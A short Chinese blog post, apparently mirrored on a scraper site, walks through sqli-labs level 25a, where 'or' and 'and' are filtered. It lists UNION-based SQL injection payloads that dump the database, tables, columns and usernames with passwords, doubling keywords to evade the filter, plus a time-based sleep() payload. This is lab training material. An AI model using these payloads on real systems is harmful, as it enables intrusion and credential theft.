Less（25a）Trick with OR & AND Blind （过滤了or和and的盲注） - 走看看

zoukankan html css js c++ java

Less（25a）Trick with OR & AND Blind （过滤了or和and的盲注）

1.那么盲注是怎么过滤or和and，直接在前面加or和and

　　

　　不同于Less（25）的是，sql语句中对于id，没有"的包含，同时没有输出错误项，报错注入不能用。

2.联合注入

　　（1）爆库：?id=-1%20union%20select%201,2,database()--+

　　　　

　　（2）爆表：?id=-1%20union%20select%201,2,group_concat(table_name)%20from%20infoorrmation_schema.tables%20where%20table_schema="security"--+

　　　　

　　（3）爆列名：?id=-1' union select 1,2,group_concat(column_name) from infoorrmation_schema.columns where table_name="users" --+

　　　　

　　（4）爆值：?id=-1 union select 1,2,group_concat(username,'~',passwoorrd)from security.users --+

　　　　

3.时间延迟

　　（1）数据库长度：?id=-1%20||%20if(length(database())=8,1,sleep(5))#

　　　　

　　

查看全文

相关阅读:
Centos7 ifconfig命令找不到
 request的各种方法
 linux开放端口
 easyui datagrid 部分参数
 设置tomcat内存
 tomcat做成系统服务
 Meta-analysis with complex research designs: dealing with dependence from multiple measures and multiple group comparisons
多重校正
 DTI
learning source archive

原文地址：https://www.cnblogs.com/meng-yu37/p/12357771.html

Copyright © 2011-2022 走看看